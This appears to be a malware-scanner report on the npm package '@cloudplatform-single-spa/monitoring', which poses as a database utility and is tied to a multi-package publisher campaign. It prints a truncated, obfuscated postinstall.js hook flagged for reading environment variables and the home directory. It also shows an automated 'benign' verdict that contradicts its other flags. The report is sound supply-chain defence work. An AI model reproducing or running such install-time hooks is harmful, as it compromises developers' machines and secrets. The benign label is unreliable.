// npm 패키지
@cloudplatform-single-spa/monitoring
Internal database utilities with connection pooling, query builder and migration support
버전
3
메인테이너
1
라이선스
UNLICENSED
최초 publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,350 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
evidence in excerpt
> 'use strict';const a0_0x2c70a3=a0_0x5bc2;(function(_0x317c27,_0x4af8e1){const _0x9c7cd7=a0_0x5bc2,_0xe22508=_0x317c27();while(!![]){try{const _0x79c7d7=-parseInt(_0x9c7cd7(0xf2))/(-0x1cb3+-0x1286*-0x2…// publisher 캠페인by mr.4nd3r50n
이 계정에서 catch된 패키지 9건고립된 catch가 아닙니다. 동일 publisher가 8개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 100/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:24publisher-version-pump:25osv-flagged:MAL-2026-4952reads-env-varsreads-homedir
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x2c70a3=a0_0x5bc2;(function(_0x317c27,_0x4af8e1){const _0x9c7cd7=a0_0x5bc2,_0xe22508=_0x317c27();while(!![]){try{const _0x79c7d7=-parseInt(_0x9c7cd7(0xf2))/(-0x1cb3+-0x1286*-0x2+-0x858)*(parseInt(_0x9c7cd7(0xfd))/(-0x6*0x19f+0x163d+-0xc81))+-parseInt(_0x9c7cd7(0xa2))/(-0x1132+-0x2570+-0x36a5*-0x1)*(parseInt(_0x9c7cd7(0xec))/(0x83b*-0x4+0x4fc*-0x2+0x55d*0x8))+-parseInt(_0x9c7cd7(0xd0))/(-0x171a+-0x1248+0x2967)*(-parseInt(_0x9c7cd7(0xff))/(-0xc2*0x13+0x10da+-0x137*0x2))+-parseInt(_0x9c7cd7(0x105))/(-0x148c+0xf1a+0x3*0x1d3)*(parseInt(_0x9c7cd7(0xf7))/(-0x1119+0x3a*-0x49+0x11*0x1fb))+parseInt(_0x9c7cd7(0x10e))/(0x1*0x1543+0x1fd*-0x13+0x108d)+-parseInt(_0x9c7cd7(0xa4))/(0x16*-0x107+-0x2d+-0x3b*-0x63)+-parseInt(_0x9c7cd7(0xc4))/(0x1*0x16e5+-0x11*0x122+0x5*-0xb8)*(-parseInt(_0x9c7cd7(0x107))/(-0x274*0x6+-0x494+0x8*0x26b));if(_0x79c7d7===_0x4af8e1)break;else _0xe22508['push'](_0xe22508['shift']());}catch(_0xd8c72a){_0xe22508['push'](_0xe22508['shift']());}}}(a0_0x3830,-0x107627+-0x71af9+0xb*0x2fae1));function a0_0x3830(){const _0x5a86b8=['Ahr0Chm6','Dw5SAw5Ru3LUyW','EwfYBI5SB2nR','BxrPBwvnCW','uKvdt05Ft05mwq','yxbWBhK','uefzte9bra','C3rHDfn5BMm','y2HHCKnVzgvbDa','mZKZmJHWz1rUwg0','y3DK','ChvZAa','zxHWAxjLCW','rLvtsu9oxW','BdK1sgreyxOZA1f4mvPZzZnxEeG2shzlqu5Mntfswte','nZu3v2HvqxDl','q0XpvurqtefurK9stv9tsu5htevFu1bbx05px1rftevnrvrswq','vKvs','DgLTzw91Da','Dw5Yzwy','mtC5ntiZmM1HqM9Yqq','BgvUz3rO','ChjVDg9JB2W','zw5K','C3rKAw8','CgfJA2fNzs5QC29U','odK4BLbvAgzk','kc --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
